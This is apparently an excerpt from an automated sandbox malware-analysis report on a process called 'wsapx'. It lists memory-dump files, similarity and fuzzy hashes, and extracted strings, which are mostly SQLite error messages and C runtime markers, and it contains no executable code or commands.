                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                • Instruction ID: 16145053c0ed3a18468c6fd78810d73d1cd33425ca6b9729971fed79934a4a0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32111520F0920783FA687FA5785627E918A5FC5F70FD85734D93E8A6C2DD2CB5438222
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00007FFD947A37CC
                                                                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00007FFD947A34B5
                                                                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFD947A34DE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                • API String ID: 3344901894-272990098
                                                                                                                                                                                                                                                • Opcode ID: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                                                                                                • Instruction ID: 8d94dc4b2e9d14a4aad24c8563c40f3123fa564f7ea97f66ec14d151e017a0f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35D1EF62B0AB89C2EA748F9590E46B977A1FB46B84F548131DE5D07786DF3CE441C390
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                • API String ID: 3344901894-1987291987
                                                                                                                                                                                                                                                • Opcode ID: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                                                                                                • Instruction ID: 2ef50576dceae34dab70c923c2407e9510804c0b0ab70323fc951a71c346c6d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AC19F32B08A85C6EA28CF95A4E067977A1FB86BE0F448635DA6D077D6DF3CE441C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 3344901894-3764764234
                                                                                                                                                                                                                                                • Opcode ID: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                                                                                                • Instruction ID: 00a5ecbb0b988e32b6815dde27041a568d8204fce0e1239c23a32ab95ec49e73
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDB1F032B0869AC6D770CBA5A0A4BBA77A6FB49B90F018135DE4D47B87DF39D440C781
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 0-3764764234
                                                                                                                                                                                                                                                • Opcode ID: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                                                                                                • Instruction ID: 62e804e13b8af2932ed9722c3107ae6b3184504a4369d808bbf39ef858a84111
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0A14772B0C3D5CAD7748BA894A46BD7B91FB82740F44C935DB8A8B682DE3CE146C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction ID: 922d11b8d62e10db57ae46b8a43be90811dd9f96d16df67f441aa31be4d89574
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5991D132A08A4682F761AEA5E45077DB7A1ABC0FA4FC44136DA5E433C5DF3CE4078322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 3344901894-3764764234
                                                                                                                                                                                                                                                • Opcode ID: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
                                                                                                                                                                                                                                                • Instruction ID: cdc31f79a3e3ce94d7c88b641a50ca3592822a37dfa2a2d7e826e24d0bca9e52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a81c8cbb4aa2b9f2a700104a6053669787526fe1ac8cdbb7c926e4a602ee9f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8815823B082E589E371DEA5A0A05F93A91E712791F45853AEFC94B3C2DA3CD987D350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction ID: 83d486029c2d1cb82f270f4f28fc2789f2d4ab47bdb8e388e269bc910bf1185d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE81A433E0824287F7646EA5A11027CB7A8AB91F64FD68035DA0997299DF2DE9039361
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007B2246570
                                                                                                                                                                                                                                                • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                • API String ID: 511975427-87138338
                                                                                                                                                                                                                                                • Opcode ID: d800521c55394c3ad25b6a38125f6762d0e11982fd6218b3e6ef33505340922b
                                                                                                                                                                                                                                                • Instruction ID: c1520902867a64b84de5893841fde55cc8bb6ecf53eb3b912e98cdbc4ffa60d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d800521c55394c3ad25b6a38125f6762d0e11982fd6218b3e6ef33505340922b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F6128B2B1864256E6708B95A8946FA7252FB82B90F44C235EF79C7BC6DF3CE501C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction ID: 84f239a1754c7d21c042ef0a012b966b119375654e5d72b2eea359f60de99f95
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4519072B296028BDB18AF15F446A78B791EB84FA8F904174DE8E47748DF3DE842C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction ID: 69018d22b3a797c0cf694384062b908ce680bd29574af46cd00a29181fac4f13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00619EB2908B8582EB20AF25F4403AAB7A4FBC5BA4F444625EF9C03B55CF7CD195CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction ID: 8bad83fd77456f50d4f3da069cbbc2363f3e3353a36a0c3803c1607745fba7b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A51D3B290824287EB64AF25E084768B7A8FB94FA4F944135EE4C43BD5CF3CE552C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 3344901894-3764764234
                                                                                                                                                                                                                                                • Opcode ID: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
                                                                                                                                                                                                                                                • Instruction ID: f54d01d4fd1aad717c257df1cff23a8350cd815259da673f181a6cdf33e7a991
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f983514268cc7df1290e166eec0b47a294775388fb5c19de4c52b4ac99553b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7519F72708B85C6EB64CBA5D1906BA73A4FB49B84F548036DF4D47796EF38E852C380
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                • API String ID: 3344901894-3764764234
                                                                                                                                                                                                                                                • Opcode ID: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
                                                                                                                                                                                                                                                • Instruction ID: 1a02f8664eb89a707819b0e5c5943112423ec6c4b42c19df9e7c5a176ee8284a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A941B032B18649C2E7609F95E4A02BD73A5FB85B90F548135EA4D5B795DF3CD802C780
                                                                                                                                                                                                                                                APIs
